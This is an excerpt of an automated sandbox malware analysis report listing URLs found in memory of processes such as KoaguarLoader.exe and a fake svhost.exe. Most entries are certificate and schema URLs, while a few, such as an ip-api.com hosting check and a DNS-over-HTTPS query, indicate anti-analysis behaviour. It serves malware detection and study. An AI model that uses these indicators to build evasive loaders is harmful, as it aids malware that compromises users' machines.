0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001896000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalG2TLSRSASHA2562020CA1-1.crl0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B9E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DF6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl00
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000255C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001CA2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crthttp://c.pki.goog/r/gsr1.crl
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024F4000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BA7000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crtGlobalSign
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0
                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000005.00000002.1032821832.000002B0CAEA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1159859244.000002226AE23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yak
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024EE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024BE000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002492000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B72000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.0000000001870000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B78000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yak0%
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yakhttp://i.pki.goog/we1.crt
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/Yaks
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C04000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C1E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BBE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FEC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0Q
                        Source: HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comDigiCert
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000276C000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002528000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D5C000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018A8000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C60000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001F12000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000275E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D50000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EFE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                        Source: KoaguarLoader.exe, 00000002.00000003.938189244.0000000001AE2000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938216439.0000000001AF4000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938305183.0000000001AFA000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.938239446.0000000001AF8000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.944038245.0000000001AFB000.00000004.00000020.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000003.937986127.0000000001AD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BB059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1005496636.000002B0BAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225ADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E45FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BB059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225AFD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B44000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002560000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002526000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D20000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018E2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018DC000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D5E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001ECE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EC8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                        Source: HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.orgChambers
                        Source: KoaguarLoader.exe, 00000002.00000002.951588515.0000000002868000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002472000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000245E000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002408000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.0000000002466000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.000000000246A000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C38000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C2E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C28000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C3E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001BAE000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B48000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1091055093.0000000001C32000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C5A000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001CD6000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001FCD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002550000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D0E000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018D0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D86000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1217387150.0000000001C7A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2129024902.0000000000291000.00000040.00000001.01000000.00000009.sdmp, I1y524I4zau1n3u.exe, 00000017.00000001.1289075938.0000000000291000.00000040.00000001.01000000.00000009.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=failed
